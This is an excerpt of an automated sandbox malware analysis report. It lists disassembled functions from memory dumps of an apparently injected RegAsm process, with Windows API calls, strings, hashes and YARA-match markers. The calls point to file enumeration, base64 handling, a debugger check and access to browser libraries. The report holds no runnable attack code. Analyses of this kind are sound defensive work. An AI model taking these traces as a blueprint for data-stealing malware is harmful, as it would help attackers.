GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 6C579E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C579F3D
__aulldiv.LIBCMT ref: 6C579F77
__aullrem.LIBCMT ref: 6C579F8C
__aulldiv.LIBCMT ref: 6C57A023

Strings

-Infinity, xrefs: 6C579E60, 6C579E7B
NaN, xrefs: 6C579EAB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 9760d2f32544009feaf4d4b099a94aafe24690a9cf5d3a9b65dade0f3febafea
Instruction ID: 64cd1ee9159457724820c247ed9ada3bb4b1f3af37e000185c9e4cbc853a2ee9
Opcode Fuzzy Hash: 9760d2f32544009feaf4d4b099a94aafe24690a9cf5d3a9b65dade0f3febafea
Instruction Fuzzy Hash: 8AC1B071E04318CBEB24CFA8CC54B9EB7B6EB88314F545529D405ABB80D770ED89CBA1

Function 0040B93F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
FindClose.KERNEL32(?), ref: 0040BF05

Strings

\*.*, xrefs: 0040B965

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2390431556-1173974218
Opcode ID: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction ID: 085151aa20985cc1c24b900562e2038c57bb153a1e06efcc5d93ab1db404d891
Opcode Fuzzy Hash: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction Fuzzy Hash: 34E1DA7194012D9BCF21FB26DD4AACDB375AF44309F4100E6A508B71A1DB79AFC98F98

Function 6C58545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C588A4B

Strings

~qQl, xrefs: 6C58921F, 6C589269, 6C585740, 6C589459, 6C585703, 6C5856C7, 6C58948F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qQl
API String ID: 2221118986-406014898
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 4fc0d5ef9d6e3cc71dbd721824c4192e89062c100fb64f177d40c6f1021a001c
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: E3B1E872E0122ACFDB14CF68CC917E9B7B2EF85314F1402A9C549EB795E730A985CB90

Function 6C58542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C5888F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C58925C

Strings

~qQl, xrefs: 6C58921F, 6C589269, 6C585740, 6C589459, 6C585703, 6C5856C7, 6C58948F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qQl
API String ID: 2221118986-406014898
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 5034ab951a995341d1ecb70f2a6c3f1ad9c65335a2fce5c6562ca0e43af6ea89
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: A1B1B572E0621ACFDB14CF58CC816EDB7B2EF85314F150269C549EB795D730A989CB90

Function 6C5850C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C588E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C58925C

Strings

~qQl, xrefs: 6C58921F, 6C589269, 6C585740, 6C589459, 6C585703, 6C5856C7, 6C58948F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memset
String ID: ~qQl
API String ID: 2221118986-406014898
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: e4accfa29a0a3b6f9d138b79abe7c259ba0a9af2ef68d77b95047a98b258dc5b
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: C2A1E772A0112ACFDB14CF68CC817A9B7B2EF85314F1402B9C949EB795D730AD99CB90

Function 6C57B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C529B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C57B92D), ref: 6C529BC8
Part of subcall function 6C529B80: __Init_thread_footer.LIBCMT ref: 6C529BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C5203D4,?), ref: 6C57B955
NtQueryVirtualMemory.NTDLL ref: 6C57B9A5
NtQueryVirtualMemory.NTDLL ref: 6C57BA20
RtlNtStatusToDosError.NTDLL ref: 6C57BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C57BA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C57BA86

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 2df2ac7206d6bca49e4ce38b3a083787e7983f3185ee9391f26fc646af82b49c
Instruction ID: 0d6b576d900001f35f46d4a1777d70bf8767604fe3d18871b4ff1f978ee9e516
Opcode Fuzzy Hash: 2df2ac7206d6bca49e4ce38b3a083787e7983f3185ee9391f26fc646af82b49c
Instruction Fuzzy Hash: 12513B71E01219DFDF24EEA8DD80ADDB7B6EB88318F154129E901B7744DB30AD85CBA0

Function 0042B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148

Strings

OCP, xrefs: 0042B0EC
ACP, xrefs: 0042B0DB

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1

Function 6C558AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C54FA80: GetCurrentThreadId.KERNEL32 ref: 6C54FA8D
Part of subcall function 6C54FA80: AcquireSRWLockExclusive.KERNEL32(6C59F448), ref: 6C54FA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C571563), ref: 6C558BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C571563), ref: 6C558C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C571563), ref: 6C558C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C571563), ref: 6C558CBA
free.MOZGLUE(?), ref: 6C558CCF

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: a2fb7e7d42411e8a399891607397698ad3834cef52dc664e0d19fe2a24310949
Instruction ID: 6314a6399da4d6ad4572fbbd263afd6be14c08894713f131df248b91a11361cf
Opcode Fuzzy Hash: a2fb7e7d42411e8a399891607397698ad3834cef52dc664e0d19fe2a24310949
Instruction Fuzzy Hash: 26717F75A14B00CFD708CF29C88066AB7F1FF99314F559A5EE9899B722E770E884CB41

Function 0041D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D44E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
TerminateProcess.KERNEL32(00000000), ref: 0041D491

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E

Function 6C5677A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C567A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C567A93

Part of subcall function 6C535C50: GetTickCount64.KERNEL32 ref: 6C535D40
Part of subcall function 6C535C50: EnterCriticalSection.KERNEL32(6C59F688), ref: 6C535D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C567AA1

Part of subcall function 6C535C50: __aulldiv.LIBCMT ref: 6C535DB4
Part of subcall function 6C535C50: LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C535DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C567B31

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 47ef7a0a8496986ab6e31e9eaf7ebc36e4140fd8b2ee66f285d5978058c371c5
Instruction ID: b537f61881dd59970e4fdbe31c97f1f4ec93305e384003b1c4a90136c66a87fe
Opcode Fuzzy Hash: 47ef7a0a8496986ab6e31e9eaf7ebc36e4140fd8b2ee66f285d5978058c371c5
Instruction Fuzzy Hash: CBB17B35608381CBCB14CF26C85065FB7E2AFC9358F154A1DE99567BA1DB70ED0ACB82

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24

Function 6C57B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C57B720
RtlNtStatusToDosError.NTDLL ref: 6C57B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C54FE3F,00000000,00000000,?,?,00000000,?,6C54FE3F), ref: 6C57B760

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: ea6c7bdd60d0a5ed7e131d1fc6effbbee1f3e0d6b436ab9e47e750013b18da6a
Instruction ID: 4dfd0efce1bcdca84e22ad52726d2a9d3a6c06f87f13ae1e2872519d3e665c07
Opcode Fuzzy Hash: ea6c7bdd60d0a5ed7e131d1fc6effbbee1f3e0d6b436ab9e47e750013b18da6a
Instruction Fuzzy Hash: 00F0C2B0A0020CEEEF11AAA1CCC4BEF77BD9B44319F105229E511696C0D778A9CCC671

Function 6C57B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C5203D4,?), ref: 6C57B955
